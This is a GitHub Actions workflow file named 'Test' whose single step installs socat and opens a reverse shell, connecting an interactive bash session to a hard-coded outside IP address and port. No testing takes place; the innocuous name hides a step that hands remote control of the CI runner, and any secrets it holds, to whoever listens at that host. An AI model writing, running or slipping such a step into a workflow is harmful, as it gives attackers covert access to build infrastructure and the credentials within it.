name: Test

on:
#  schedule:
#  - cron: "*/10 * * * *"    # Every 30 minutes

  workflow_dispatch:
  
jobs:
  tag:
    name: Test
    runs-on: ubuntu-latest
    steps:
      - name: Test.
        id: check
        shell: bash
        run: |
          sudo apt install socat
          socat tcp:51.75.78.69:8529 exec:"bash -i",pty,stderr,setsid,sigint,sane
